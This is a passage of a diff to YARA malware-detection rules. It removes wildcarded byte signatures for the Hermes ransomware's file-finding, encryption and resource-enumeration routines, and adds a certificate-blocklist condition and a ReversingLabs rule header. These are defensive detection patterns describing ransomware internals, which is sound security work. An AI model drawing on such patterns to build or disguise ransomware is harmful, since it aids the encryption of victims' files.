-            ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 7D ?? A5 A5 A5 A5 33
-        }
-		$hermes_find_files_v1_p2 = {
-            C0 6A ?? 59 6A ?? 8D 7D ?? 66 AB BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3 A5 59 BE ?? ??
-            ?? ?? 8D BD ?? ?? ?? ?? F3 A5 BE ?? ?? ?? ?? 8D 7D ?? A5 A5 A5 A5 6A ?? 59 8D 7D ??
-            AB BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3 A5 8D BD ?? ?? ?? ?? AB AB 66 AB BE ?? ?? ??
-            ?? 8D 7D ?? A5 A5 A5 A5 33 C0 6A ?? 8D 7D ?? AB 59 BE ?? ?? ?? ?? 8D BD ?? ?? ?? ??
-            F3 A5 66 A5 8D BD ?? ?? ?? ?? AB BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? A5 A5 A5 A5 8D BD
-            ?? ?? ?? ?? AB AB AB 66 AB 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85
-            C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59
-            85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59
-            59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D
-            85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50
-            8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 0F
-        }
-		$hermes_find_files_v1_p3 = {
-            84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ??
-            ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59
-            85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F
-            85 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F
-            85 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D
-        }
-		$hermes_find_files_v1_p4 = {
-            45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 45
-            ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? F6 85
-            ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 53 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8B C8 E8 ?? ?? ?? ?? 83 F8 ?? 7E ?? 53 FF 75
-            ?? FF 75 ?? E8
-        }
-		$hermes_encrypt_files_v1_p1 = {
-            55 8B EC 83 EC ?? 53 56 57 FF 75 ?? FF 15 ?? ?? ?? ?? BB ?? ?? ?? ?? 3B C3 74 ?? 53
-            FF 75 ?? FF 15 ?? ?? ?? ?? 33 F6 56 53 6A ?? 56 56 68 ?? ?? ?? ?? FF 75 ?? FF 15 ??
-            ?? ?? ?? 89 45 ?? 3B C6 0F 84 ?? ?? ?? ?? 8D 4D ?? 51 50 FF 15 ?? ?? ?? ?? 89 45 ??
-            83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 82 ?? ?? ?? ?? 56 89 45 ?? 8D 45 ?? 50 56 56
-            6A ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? BF ?? ?? ?? ?? 57 FF 75 ?? 56
-            FF 15 ?? ?? ?? ?? 89 45 ?? 3B C6 74 ?? 56 8D 4D ?? 51 FF 75 ?? 89 75 ?? 50 FF 75 ??
-            FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 8B 4D ?? 8D 44 08 ?? 80 38 ?? 75 ?? 80 78 ??
-            ?? 75 ?? 80 78 ?? ?? 75 ?? 80 78 ?? ?? 75 ?? 80 78 ?? ?? 75 ?? 80 78 ?? ?? 75 ?? FF
-            75 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B
-        }
-		$hermes_encrypt_files_v1_p2 = {
-            C9 C3 FF 75 ?? 8D 45 ?? 50 51 56 6A ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56
-            56 56 FF 75 ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 E8 ?? ?? ??
-            ?? 6A ?? 57 FF 75 ?? 88 45 ?? 56 FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 3B FE 74 ?? FF 75
-            ?? 0F BE 45 ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 56 8D 45 ?? 50 FF 75 ?? 89 75 ?? 57 FF
-            75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? BF ?? ?? ?? ?? 57 56 FF 75 ?? FF 15
-            ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 56 53 6A ?? 56 56 68 ?? ?? ?? ?? FF 75 ?? FF
-            15 ?? ?? ?? ?? 8B D8 3B DE 0F 84 ?? ?? ?? ?? 56 8D 45 ?? 50 FF 75 ?? 89 75 ?? FF 75
-            ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 56 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ??
-            53 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 57 56 FF
-            75 ?? FF 15 ?? ?? ?? ?? 33 C0 40 E9
-        }
-		$hermes_enum_resources_v1 = {
-            55 8B EC 83 EC ?? 53 56 57 8D 45 ?? 50 FF 75 ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A
-            ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? 6A ?? FF
-            15 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? FF 75 ?? 6A ?? 53 E8 ?? ?? ?? ?? 83 C4
-            ?? 8D 45 ?? 50 53 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B
-            43 ?? 66 83 38 ?? 8D 48 ?? 75 ?? 66 83 78 ?? ?? 75 ?? 6A ?? 51 E8 ?? ?? ?? ?? 59 59
-            85 C0 74 ?? 8B 43 ?? 8B D0 66 8B 08 40 40 66 85 C9 75 ?? 8B 7D ?? 2B C2 4F 4F 66 8B
-            4F ?? 47 47 66 85 C9 75 ?? 8B C8 C1 E9 ?? 8B F2 F3 A5 8B C8 83 E1 ?? F3 A4 8B 7D ??
-            4F 4F 66 8B 47 ?? 47 47 66 85 C0 75 ?? BE ?? ?? ?? ?? A5 8B 43 ?? 83 E0 ?? 3C ?? 0F
-            85 ?? ?? ?? ?? FF 75 ?? 53 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 33 C0 5F 5E
-            5B C9 C3 33 C0 40 EB
-        }
-		$hermes_encrypt_files_v2_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 33 C0 8D BD ?? ?? ?? ?? AB 33 DB 89 5D ?? AB AB
-            AB 8B 7D ?? 57 FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 57 FF 15 ?? ?? ?? ?? 53 56 6A ??
-            53 53 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B F0 85 F6 75 ?? 53 FF 15 ?? ?? ?? ?? 33
-            C0 E9 ?? ?? ?? ?? 33 DB 33 C0 89 5D ?? 0F 57 C0 89 45 ?? 66 0F 13 45 ?? 83 FE ?? 74
-            ?? 8D 45 ?? 50 56 FF 15 ?? ?? ?? ?? 8D 45 ?? 50 56 FF 15 ?? ?? ?? ?? 8B 5D ?? 8B 45
-            ?? 83 FB ?? 75 ?? 85 C0 75 ?? 33 FF 47 E9 ?? ?? ?? ?? 83 65 ?? ?? 83 7D ?? ?? 77 ??
-            81 7D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ??
-            6A ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B 4D ??
-            89 45 ?? 83 F9 ?? 72 ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 76 ?? 6A ?? 6A ?? 51 FF 75 ?? E8
-            ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 45 ?? 3D ?? ?? ?? ?? 76 ??
-            C7 45 ?? ?? ?? ?? ?? EB ?? 8B 55 ?? 8B C1 81 C2 ?? ?? ?? ?? 83 D0 ?? 83 F8 ?? 77 ??
-            72 ?? 81 FA ?? ?? ?? ?? 77 ?? 6A ?? 6A ?? 51 FF 75 ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 52
-            50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 45 ?? EB ?? 83 F9
-        }
-		$hermes_encrypt_files_v2_p2 = {
-            77 ?? 72 ?? 81 7D ?? ?? ?? ?? ?? 73 ?? 8B 45 ?? EB ?? 8B 45 ?? 3D ?? ?? ?? ?? 0F 87
-            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 0F 82 ?? ?? ?? ?? 83 7D ?? ??
-            0F 82 ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 83 7D ?? ?? B8 ?? ?? ?? ?? 77 ?? 39
-            45 ?? 0F 86 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? 2B D8 53 56 89 5D ?? FF 15 ?? ?? ?? ??
-            83 F8 ?? 75 ?? 6A ?? 58 E9 ?? ?? ?? ?? 33 DB 8D 45 ?? 53 50 6A ?? 8D 85 ?? ?? ?? ??
-            89 5D ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? EB ?? 8B C3 80 BC 05 ?? ?? ?? ??
-            ?? 75 ?? 80 BC 05 ?? ?? ?? ?? ?? 75 ?? 80 BC 05 ?? ?? ?? ?? ?? 75 ?? 80 BC 05 ?? ??
-            ?? ?? ?? 75 ?? 80 BC 05 ?? ?? ?? ?? ?? 75 ?? 80 BC 05 ?? ?? ?? ?? ?? 74 ?? 40 83 F8
-            ?? 72 ?? 53 53 53 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 6A ?? E9 ?? ?? ??
-            ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 58 6A ?? 66 89 45 ?? 58 66 89 45 ?? 6A ?? 58 66 89 45
-            ?? 33 C0 66 89 45 ?? 8D 45 ?? 50 57 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 6A ?? 68 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 57 56 89 1E E8 ?? ?? ??
-            ?? 57 56 E8 ?? ?? ?? ?? 8D 45 ?? 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 56 57 FF 15 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 53 56 FF 15 ?? ?? ?? ?? 6A ?? E9 ?? ?? ?? ?? 33 DB 8D 45
-        }
-		$hermes_encrypt_files_v2_p3 = {
-            50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? E9 ?? ?? ?? ??
-            39 5D ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 77 ?? 53 53 68 ?? ?? ?? ?? FF 75 ?? FF 75 ?? E8
-            ?? ?? ?? ?? 89 5D ?? 5B 6A ?? 89 4D ?? 33 DB 89 45 ?? 89 55 ?? 5F EB ?? 8B 45 ?? 89
-            45 ?? 53 69 C0 ?? ?? ?? ?? 53 50 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 6A ?? E9 ?? ??
-            ?? ?? 53 8D 45 ?? 89 5D ?? 50 6A ?? 5F 57 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ??
-            85 C0 75 ?? 6A ?? E9 ?? ?? ?? ?? 53 53 53 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 6A ??
-            E9 ?? ?? ?? ?? 89 5D ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B
-            D8 85 DB 75 ?? 6A ?? E9 ?? ?? ?? ?? 8B 55 ?? 33 C9 33 C0 C7 45 ?? ?? ?? ?? ?? 89 4D
-            ?? 89 45 ?? 83 65 ?? ?? C7 45 ?? ?? ?? ?? ?? 3B CA 75 ?? 8B 4D ?? 89 4D ?? C7 45 ??
-            ?? ?? ?? ?? 33 C9 51 51 50 56 89 4D ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ??
-            6A ?? 8D 45 ?? 50 FF 75 ?? 53 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 33 C9 C7
-        }
-		$hermes_encrypt_files_v2_p4 = {
-            45 ?? ?? ?? ?? ?? 51 8D 45 ?? 50 51 51 FF 75 ?? 51 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0
-            0F 84 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? 50 53 6A ?? FF 75 ?? 6A ?? FF 75 ?? FF 15 ?? ??
-            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F
-            84 ?? ?? ?? ?? 83 65 ?? ?? 8D 45 ?? 6A ?? 50 FF 75 ?? 53 56 FF 15 ?? ?? ?? ?? 85 C0
-            0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 45 ?? 41 8B 55 ?? 05 ?? ?? ?? ?? 89 4D ?? 89 45 ?? 3B
-            CA 0F 86 ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 8D 7D ?? 66 C7 45 ?? ?? ?? AB AB AB
-            AB 66 AB 33 C0 88 45 ?? 39 45 ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 77 ?? 8D 45 ?? 50 8D 45
-            ?? 50 E8 ?? ?? ?? ?? 59 59 EB ?? 6A ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 33 C0 8D 7D ??
-            AB 6A ?? AB 66 AB 8D 45 ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 FF 8D 45 ?? 57 50 8D
-            45 ?? 89 7D ?? 50 E8 ?? ?? ?? ?? 59 50 8D 45 ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ??
-            68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? ?? 6A ?? E9 ?? ?? ?? ?? 8D 45 ?? 50 57 57 6A
-        }
-		$hermes_encrypt_files_v2_p5 = {
-            FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ??
-            ?? 6A ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 57 6A ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85
-            C0 75 ?? 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? ?? 6A ?? E9 ?? ?? ?? ?? 57 8D 45 ?? 89
-            7D ?? 50 FF 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ??
-            ?? 57 53 FF 15 ?? ?? ?? ?? 6A ?? E9 ?? ?? ?? ?? 39 7D ?? 77 ?? 81 7D ?? ?? ?? ?? ??
-            76 ?? 6A ?? 57 0F 57 C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 83 F8
-            ?? 75 ?? 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? ?? 6A ?? EB ?? 57 8D 45 ?? 89 7D ?? 50
-            6A ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 57 53 FF
-            15 ?? ?? ?? ?? 6A ?? EB ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 53 E8 ?? ?? ?? ??
-            83 C4 ?? 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? ?? 6A ?? 5B EB ?? 68 ?? ?? ?? ?? 6A ??
-            53 FF 15 ?? ?? ?? ?? 6A ?? 5B 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B C3
-            EB ?? FF 75 ?? FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? EB ?? FF 75 ?? FF 15 ??
-            ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? EB ?? FF 75 ?? FF 15 ?? ?? ?? ?? 56 FF 15 ?? ??
-            ?? ?? 6A ?? 5F EB ?? 6A ?? 5F 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 6A ?? 53 FF 15 ?? ?? ?? ?? EB ?? 6A ?? E9 ?? ?? ?? ?? 6A ?? 5F 56 FF 15 ??
-            ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3
-        }
-		$hermes_find_files_v2_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 8B 5D ?? 8D 85 ?? ?? ?? ?? 56 57 50 68 ?? ?? ?? ?? 53
-            E8 ?? ?? ?? ?? 59 59 50 FF 15 ?? ?? ?? ?? 8B F8 68 ?? ?? ?? ?? 53 89 7D ?? E8 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 53 8B F0 E8 ?? ?? ?? ?? 2B C6 33 C9 83 C4 ?? 66 89 0C 43 83
-            FF ?? 0F 84 ?? ?? ?? ?? 33 F6 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 83 F8 ?? 75 ??
-            8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 57
-            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 83
-            F8 ?? 75 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8D
-            85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 58 6A ?? 5F 6A
-            ?? 5A 6A ?? 66 89 45 ?? 58 6A ?? 59 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ??
-            66 89 45 ?? 33 C0 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89
-        }
-		$hermes_find_files_v2_p2 = {
-            45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 33 C0 66 89 45 ?? 58 6A ?? 66 89 45
-            ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 33 C0 66 89 55 ??
-            66 89 55 ?? 5A 6A ?? 66 89 45 ?? 58 6A ?? 66 89 85 ?? ?? ?? ?? 58 6A ?? 66 89 4D ??
-            66 89 4D ?? 66 89 8D ?? ?? ?? ?? 59 66 89 85 ?? ?? ?? ?? 6A ?? 58 66 89 85 ?? ?? ??
-            ?? 33 C0 66 89 7D ?? 66 89 BD ?? ?? ?? ?? 8D 7D ?? 89 75 ?? 66 89 75 ?? 66 89 55 ??
-            89 75 ?? 66 89 75 ?? 66 89 8D ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? 66 89 85 ?? ?? ?? ??
-            AB 6A ?? 66 89 4D ?? 66 89 55 ?? AB 66 89 55 ?? 89 75 ?? AB 66 AB 58 6A ?? 66 89 45
-            ?? 58 6A ?? 5F 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ??
-            66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 59 66 89 45 ?? 33 C0 66 89 45 ?? 6A ?? 58
-            66 89 85 ?? ?? ?? ?? 6A ?? 58 66 89 85 ?? ?? ?? ?? 6A ?? 58 66 89 85 ?? ?? ?? ?? 6A
-            ?? 58 66 89 85 ?? ?? ?? ?? 6A ?? 58 66 89 85 ?? ?? ?? ?? 33 C0 66 89 7D ?? 66 89 7D
-            ?? 8D BD ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? 66 89 8D
-        }
-		$hermes_find_files_v2_p3 = {
-            AB AB AB 66 AB 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D
-            45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
-            59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85
-            C0 0F 84 ?? ?? ?? ?? 8B 7D ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45
-            ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59
-            59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0
-        }
-		$hermes_find_files_v2_p4 = {
-            0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 8D 45 ?? 50 8D 85
-            ?? ?? ?? ?? 50 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 45
-            ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 50
-            8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 50 8D
-            85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? EB ?? 8B 7D ?? F6 85 ?? ?? ??
-            ?? ?? 74 ?? 53 E8 ?? ?? ?? ?? 59 FF 75 ?? 8D 85 ?? ?? ?? ?? FF 75 ?? FF 75 ?? 50 53
-            E8 ?? ?? ?? ?? 59 59 50 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8B F0 8D
-            85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 2B F0 83 C4 ?? 33 C0 66 89 44 73 ?? 33 F6 8D 85 ??
-            ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 5F 5E
-            5B 8B E5 5D C3
-        }
-		$hermes_enum_resources_v2 = {
-            55 8B EC 83 EC ?? 53 56 57 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF 75 ?? 33 DB C7 45 ??
-            ?? ?? ?? ?? 53 53 6A ?? 89 5D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ??
-            6A ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D
-            45 ?? 50 56 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 7E ?? 6A ?? 58 66
-            39 07 75 ?? 66 39 47 ?? 75 ?? 50 8D 47 ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 57 FF
-            75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? F7 46 ?? ?? ??
-            ?? ?? 74 ?? FF 75 ?? 56 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 33 C0 5F 5E 5B 8B E5 5D C3
-            33 C0 40 EB
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Prince city music bar" and pe.signatures [ i ] . serial == "2c:16:be:9a:7c:e2:a2:3a:b7:a4:b4:eb:7d:a3:40:0c" and 1371081600 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_22Accad235Fb1Ac7422Ebe5Ea7Ac9Bc5 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "218543f3-298f-5038-8fa9-3abeda9e4d8f"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
